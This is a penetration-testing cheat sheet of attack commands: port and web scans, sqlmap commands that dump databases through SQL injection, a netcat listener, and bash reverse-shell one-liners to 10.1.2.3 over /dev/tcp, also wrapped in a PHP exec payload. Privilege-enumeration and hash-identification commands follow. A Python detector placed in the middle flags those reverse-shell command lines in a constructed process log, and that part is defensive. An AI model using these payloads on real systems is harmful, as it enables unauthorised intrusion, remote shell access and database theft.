Scan all TCP ports quickly
nmap -Pn -n -v -sT -p- -T5 10.0.1.2
In-depth scan of specific ports
nmap -Pn -n -v -sT -p 22,80 -A 10.0.1.2
Nikto vulnerability scanner
nikto -h 10.1.2.3 -C all
whatweb web technology identifier
whatweb -v -a 3 192.168.0.102
Path enumeration with dirb:
dirb http://10.10.11.253
Test a GET parameter for SQL injection with sqlmap:
sqlmap -u "http://10.2.3.4/path/vulnerable.php?fieldname=value" -p fieldname --level 5 --risk 3 --dbs
Use a request intercepted in Burp (saved to request.txt):
sqlmap -r request.txt ...
Dump databases:
sqlmap -r request.txt -p [parameters to test] --level 5 --risk 3 --dbs
Dump tables for given database:
sqlmap -r request.txt -p [parameters to test] --level 5 --risk 3 -D db_name --tables
Dump given table for given database:
sqlmap -r request.txt -p [parameters to test] --level 5 --risk 3 -D db_name -T table_name --dump
Netcat listener (receiving side):
nc -lvnp [receiving port]
Bash reverse shell one-liners:
/bin/bash -i >& /dev/tcp/10.1.2.3/1234 0>&1
/bin/bash -l > /dev/tcp/10.1.2.3/1234 0<&1 2>&1
Same payload wrapped in PHP:
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.1.2.3/1234 0>&1'");
?>
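As an added example from the defensive side (not part of this cheat sheet), a small Python checker that flags the bash /dev/tcp reverse-shell command lines shown above when run over a constructed process-execution log; the event records and their field names are assumptions, not a real EDR or auditd format.

```python
import re

# Constructed sample of process command lines, loosely in the style of an
# execve feed. The first three reproduce the payloads quoted on this page;
# the last two are benign noise (one with a harmless redirect to /dev/null).
SAMPLE_EVENTS = [
    {"pid": 4120, "user": "www-data", "cmd": "/bin/bash -c 'bash -i > /dev/tcp/10.1.2.3/1234 0>&1'"},
    {"pid": 4125, "user": "alice", "cmd": "/bin/bash -i >& /dev/tcp/10.1.2.3/1234 0>&1"},
    {"pid": 4133, "user": "alice", "cmd": "/bin/bash -l > /dev/tcp/10.1.2.3/1234 0<&1 2>&1"},
    {"pid": 4140, "user": "alice", "cmd": "/bin/bash -c 'echo ok > /dev/null'"},
    {"pid": 4151, "user": "root", "cmd": "/usr/bin/tar -czf /tmp/backup.tgz /var/www"},
]

# A redirection (">", ">&" or "<") aimed at bash's /dev/tcp or /dev/udp
# pseudo-device, e.g. "> /dev/tcp/HOST/PORT" or ">& /dev/tcp/HOST/PORT".
DEV_TCP_REDIRECT = re.compile(
    r"(?:>&?|<)\s*/dev/(tcp|udp)/(?P<host>[0-9A-Za-z.\-]+)/(?P<port>\d{1,5})"
)
# Stdin rebound to the socket ("0>&1" or "0<&1"): the shell is interactive,
# not just exfiltrating output.
STDIN_REBIND = re.compile(r"\b0[<>]&1\b")


def classify(cmd):
    """Return a finding dict for a /dev/tcp reverse-shell command line, else None."""
    m = DEV_TCP_REDIRECT.search(cmd)
    if not m:
        return None
    return {
        "proto": m.group(1),
        "host": m.group("host"),
        "port": int(m.group("port")),
        "interactive": bool(STDIN_REBIND.search(cmd)),
        # The PHP wrapper on this page launches the shell through "bash -c".
        "via_bash_c": "bash -c" in cmd,
    }


def scan(events):
    """Run classify() over process events; return the matching events with findings."""
    hits = []
    for ev in events:
        finding = classify(ev["cmd"])
        if finding:
            hits.append({**ev, **finding})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"pid={h['pid']} user={h['user']} -> {h['proto']}://{h['host']}:{h['port']} "
              f"interactive={h['interactive']} via_bash_c={h['via_bash_c']}")
```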
User info, groups, etc.
whoami
groups
Available sudo options
sudo -l
Get the full command line for a process (PowerShell)
gwmi win32_process | Format-Table -Property ProcessId,CommandLine | findstr "<process name or PID>"
Look up the hash type:
hashid -m "hash"
$ hashid -m '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2'
Analyzing '$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x
[+] bcrypt [Hashcat Mode: 3200]